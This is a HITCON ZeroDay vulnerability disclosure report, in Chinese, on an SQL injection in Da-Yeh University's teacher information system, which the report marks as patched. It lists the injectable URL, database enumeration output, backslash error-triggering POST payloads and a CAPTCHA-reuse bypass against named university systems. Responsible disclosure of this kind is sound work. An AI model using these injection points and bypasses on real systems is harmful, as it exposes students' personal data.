Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-01444
- 發信 Vendor: 大葉大學
- Title: 大葉大學 教師資訊系統 SQL Injection Vulnerability
- Introduction: SQL Injection Vulnerability
處理狀態
目前狀態
公開
Last Update : 2018/09/29
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2018/09/23 13:46:20 : 新提交 (由 鄉民 更新此狀態)
- 2018/09/23 22:51:54 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/25 12:12:13 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/25 12:12:13 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/25 21:28:33 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/09/25 21:38:16 : 確認已修補 (由 鄉民 更新此狀態)
- 2018/09/29 03:00:12 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-01444
- 通報者:鄉民
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://tis.dyu.edu.tw/dis/SearchStudent.php?data=&data2=e
敘述
這應該是我在這邊提交的大葉的最後一個漏洞了,目前手邊有的東西都在裡一次提交了
http://tis.dyu.edu.tw/dis/SearchStudent.php?data=&data2=e{sqli}banner:
'Adaptive Server Enterprise/12.5.4/EBF 14931 ESD#7/P/ia64/HP-UX B.11.23/ase1254/2093/64-bit/FBO/Thu Oct 11 02:31:46 2007'available databases [11]:
[*] AC
[*] CC
[*] common
[*] ET
[*] GA
[*] master
[*] PL
[*] SA
[*] sybsecurity
[*] tempdb
[*] WD來源是這裡:
http://tis.dyu.edu.tw/dis/dyu+.php
這個不知道是設計來做什麼的,一個學號就能查詢學生照片+姓名,也能用部分姓名來模糊搜尋,有點可怕
另外這個個資盤點系統,因為沒繞過成功就不另外提交了
http://pims.dyu.edu.tw/login.php
POST: usrname=\&usrpass=123&code=137820http://pims.dyu.edu.tw/password.php
level=1&email=%5C&usrname=123&code=534619
看起來是做了htmlspecialchars保護,但是放個反斜槓還是能讓他報錯
Notice: Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1 SQL: SELECT * FROM manapar WHERE account = '\' in C:\AppServ\www\htdocs\include\MySQL.php on line 47
Fatal error: Call to a member function fetch() on a non-object in C:\AppServ\www\htdocs\login.php on line 26繞過驗證碼的方式就是不要讓他302跳轉就可以一直用同樣的驗證碼了,帳號密碼的部分應該可以利用各種系統的漏洞來獲取,不過我沒實際去測試
最後在這邊說一下,ZD-2018-01377這個影響的業務蠻大的,以前沒仔細看,上次複測的時候看到影響包括密碼管理系統、點名系統、短網址服務等等,還有一些以前我提交過的漏洞都在這台server上面,其中裡面還有一個系統我猜也是有上傳漏洞,還有一個重要系統不再這個server上的我也覺得有上傳漏洞,在實際去測試前就不說什麼系統了,怕漏洞一公開就有人會搞故壞,希望學校可以多注意各個系統的漏洞擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。